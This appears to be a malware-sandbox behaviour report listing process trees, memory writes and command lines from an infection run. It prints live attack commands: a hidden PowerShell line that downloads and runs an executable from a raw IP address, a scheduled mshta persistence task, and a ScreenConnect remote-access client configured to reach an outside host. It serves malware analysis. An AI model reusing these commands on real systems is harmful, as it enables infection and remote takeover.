Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2644 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2644 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2700 wrote to memory of 2768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2700 wrote to memory of 2768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2700 wrote to memory of 2768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2700 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2700 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2700 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2708 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2708 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2708 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2700 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2700 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2864 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2864 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2700 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2700 wrote to memory of 2568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2568 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2700 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2700 wrote to memory of 2992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2700 wrote to memory of 1964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 2700 wrote to memory of 1964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 2700 wrote to memory of 1964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 1964 wrote to memory of 2536 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1964 wrote to memory of 2536 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1964 wrote to memory of 2536 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2536 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 2536 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 2536 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 2536 wrote to memory of 1708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 1708 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1708 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1708 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1708 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1284 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 1284 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 1284 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 1284 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe
PID 2092 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Windows\SysWOW64\WerFault.exe
PID 2092 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe C:\Windows\SysWOW64\WerFault.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat" any_word

C:\Windows\system32\timeout.exe

timeout /t 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "d93aVmafZtV" /tr "mshta \"C:\Temp\2fJgGTIv1.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\system32\mshta.exe

mshta "C:\Temp\2fJgGTIv1.hta"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

"C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 512

C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe

"C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7829758,0x7fef7829768,0x7fef7829778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1112 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2224 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2160 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1416 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1384 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3348 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3604 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe

"C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3492 --field-trial-handle=1368,i,16591011724913026818,8800948318193845533,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe"

C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe

"C:\Users\Admin\AppData\Local\Temp\10003000101\57028ffad4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 504

C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe

"C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\hdj5f" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 11

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 504

C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe

"C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe"

C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe

"C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding B68547F334DCA1C474863AADBADB0EF8 C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI23F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259531858 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe

"C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe"

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005BC" "00000000000003B8"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A79654B28112A4B18EDC17244DDED017

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 3133C096E95C5234DCB5CF270969206A M Global\MSI0000

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=6b3c9f2e-719d-4888-b6ab-03b40b2eb090&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&c=test&c=&c=&c=&c=&c=&c=&c="

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

